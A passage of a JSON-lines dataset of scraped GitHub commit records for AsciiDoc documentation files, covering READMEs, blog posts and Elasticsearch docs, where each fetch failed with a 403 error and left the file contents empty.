fix\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d53a5f76f890883315f7b8a38c87e96117d29feb","subject":"Setting version number in README","message":"Setting version number in README\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdeb78ba9ad30a47ce4d2535422d1deb6888c892","subject":"README.adoc updated with build info","message":"README.adoc updated with build info\n","repos":"BarclaysAfrica\/helloworld,BarclaysAfrica\/helloworld","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BarclaysAfrica\/helloworld.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a086856836c7dd1268f8a7dc4121493a1bf8828d","subject":"doc: Update gitter badge","message":"doc: Update gitter badge\n","repos":"gravitee-io\/gravitee-policy-groovy","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b7f979a92062baa4c1da2273a4a164f10d4309a","subject":"examples readme","message":"examples readme\n","repos":"ivargrimstad\/snoop-samples,ivargrimstad\/snoop-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoop-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"078889b525c76681c7d2e7d2b55f101a13d09232","subject":"updated README","message":"updated README\n","repos":"tuxdevelop\/spring-batch-lightmin-live,tuxdevelop\/spring-batch-lightmin-live","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tuxdevelop\/spring-batch-lightmin-live.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da393a7ef241dae0dff8722bc665579cc476bf4e","subject":"Link ex","message":"Link ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Class path\/README.adoc","new_file":"Class path\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5f5dc67a4e6aef3d35ad4f5b72ed5205de4783c","subject":"Add a simple README","message":"Add a simple README\n","repos":"Olical\/dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Olical\/dotfiles.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"fe70055882ea7470262def4ffa5137af69604047","subject":"Add a README","message":"Add a README\n","repos":"spohnan\/ci-bot-01,spohnan\/ci-bot-01","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spohnan\/ci-bot-01.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e4ef6465c780151a9bb62951f584f550f4263b","subject":"Updated readme.","message":"Updated readme.\n","repos":"jeffrimko\/Auxly","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeffrimko\/Auxly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"632df20f50b4c13df63d536e2eec61f2e921fc53","subject":"Add simple build instructions to README","message":"Add simple build instructions to README\n","repos":"ALMighty\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldimaggi\/almighty-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce9ad6f5c1bb34c3e53dc2060f13ba276bb0bdbe","subject":"Add history file","message":"Add history file\n","repos":"gregspurrier\/klam","old_file":"HISTORY.asciidoc","new_file":"HISTORY.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gregspurrier\/klam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b20a593912286c579fd8c6af06e66d62c091210","subject":"Docs test: defend against round numbers","message":"Docs test: defend against round numbers\n\nIf a shard has a nice, round number the test in the `_cat\/shards`\nreference file would fail. They should be ok with it. A failure:\nhttps:\/\/elasticsearch-ci.elastic.co\/job\/elastic+elasticsearch+5.3+multijob-unix-compatibility\/os=fedora\/93\/console\n","repos":"lks21c\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,vroyer\/elasticassandra,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,nazarewk\/elasticsearch,brandonkearby\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,s1monw\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch","old_file":"docs\/reference\/cat\/shards.asciidoc","new_file":"docs\/reference\/cat\/shards.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2be0347ba2b8f0576a8a69ba300dc3d44359e9a8","subject":"turtlebot3","message":"turtlebot3\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Ros Gazebo\/README.adoc","new_file":"Ros Gazebo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"418489a834238af4cc7c892fc796099fd178c5f3","subject":"Update 2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","message":"Update 2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","new_file":"_posts\/2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0d42603ab7574efb2d1d8ba8acef839e5a490d7","subject":"Update 2016-01-04-Java-Annotations.adoc","message":"Update 2016-01-04-Java-Annotations.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3502c76ea6d2d23a03fc552b001e7c2ca31d3965","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ebb12315f1ef99d774876a8748102c5782af6e1","subject":"Update 2015-03-11-Iron-Viking.adoc","message":"Update 2015-03-11-Iron-Viking.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Iron-Viking.adoc","new_file":"_posts\/2015-03-11-Iron-Viking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4cd9dde5770829d84099733f6e4dabaa900fcdc","subject":"Update 2016-07-15-Hello-World.adoc","message":"Update 2016-07-15-Hello-World.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-07-15-Hello-World.adoc","new_file":"_posts\/2016-07-15-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c4d86968ef8a3463ad5fbef6533b5eaed037cca","subject":"Create 2016-08-23-MSVC-P40dll.adoc","message":"Create 2016-08-23-MSVC-P40dll.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26c83f4c2dd20f67908f5121ee1940b4bb7660be","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7f39ed93af98e7a1594ac1134c328f5c25c6301","subject":"Init. How to deploy","message":"Init. How to deploy\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Maven central.adoc","new_file":"Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5942a9b797119b669d5700aad998277a43f6f6","subject":"clbin dump of lcture notes from tonights quick 10~ish minute TCP rtt overview","message":"clbin dump of lcture notes from tonights quick 10~ish minute TCP rtt overview\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture10_20171030.adoc","new_file":"lecture10_20171030.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d41709fb7b62ad3131315e4b3fd8acc8ae9721e2","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6646bcb06581042f66bf72722954330145074b19","subject":"[DOCS] Fix list formatting in TESTING.asciidoc (#33889)","message":"[DOCS] Fix list formatting in TESTING.asciidoc (#33889)\n\nFix the steps listed in `Testing packaging` to\r\n```\r\n1. step1\r\n2. step2\r\n--------------------------------------\r\nvagrant plugin install vagrant-cachier\r\n--------------------------------------\r\n3. step3\r\n```\r\ninstead of\r\n```\r\ninstead of:\r\n1. step1\r\n2. step2\r\n--------------------------------------\r\nvagrant plugin install vagrant-cachier\r\n--------------------------------------\r\n1. step3\r\n```","repos":"scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49289fb8d7d95cc0bfc96eb871a70b327b71c4fe","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/09\/16\/deref.adoc","new_file":"content\/news\/2022\/09\/16\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0b41b3ace23a7f96dcccee28afd8af0a2f102231","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9727dc004fb7669487e9f412b64176191f5ed5b","subject":"Add Classloader description doc","message":"Add Classloader description doc\n","repos":"ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee","old_file":"classloader-issue.adoc","new_file":"classloader-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fe8bf308057918e666e3890dfeada5c4370b44e","subject":"[DOCS] Fixed broken link to Logstash monitoring","message":"[DOCS] Fixed broken link to Logstash monitoring\n\nOriginal commit: elastic\/x-pack-elasticsearch@1f64dd663736f41881d37d5a4ba62d7fb9eead9f\n","repos":"nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78604ac483278e1b949225be7d5e085d1c071bfb","subject":"Documented minimal set of OSGi bundles (#9489)","message":"Documented minimal set of OSGi bundles (#9489)\n\n","repos":"Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/advanced\/advanced-osgi.asciidoc","new_file":"documentation\/advanced\/advanced-osgi.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87ff61ae1078812e6596f571c394ec5ccd6eb480","subject":"Update 2016-11-14-Pycharm.adoc","message":"Update 2016-11-14-Pycharm.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14-Pycharm.adoc","new_file":"_posts\/2016-11-14-Pycharm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e04c248e304dddb88aa1534e590f0abeb549ae0","subject":"Update 2016-01-20-Indice.adoc","message":"Update 2016-01-20-Indice.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-20-Indice.adoc","new_file":"_posts\/2016-01-20-Indice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c35bd6d024acc05175b5406f91cfff053709867b","subject":"Update 2016-05-06-Pepper.adoc","message":"Update 2016-05-06-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Pepper.adoc","new_file":"_posts\/2016-05-06-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca35e3284ba36587c2a194d4e0aad926b069cf50","subject":"Adding tutorial for stripe integration","message":"Adding tutorial for stripe integration\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/stripe_plugin.adoc","new_file":"userguide\/tutorials\/stripe_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbcbea87157c81684bf4e828719edcee48ea6166","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a20a851ca8b1165e5a63d97da2ba9133c45bdccd","subject":"Add Terminology documentation","message":"Add Terminology documentation\n","repos":"cvut\/sirius,cvut\/sirius","old_file":"docs\/terminology.adoc","new_file":"docs\/terminology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cvut\/sirius.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a569951187562e05076ee6f6fbdd7df15198575f","subject":"docs: updated release notes for elastic\/elasticsearch#649 change","message":"docs: updated release notes for elastic\/elasticsearch#649 change\n\nOriginal commit: elastic\/x-pack-elasticsearch@ee5e009fd25a54662fc94da753728e00ae2346d8\n","repos":"gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"watcher\/docs\/release-notes.asciidoc","new_file":"watcher\/docs\/release-notes.asciidoc","new_contents":"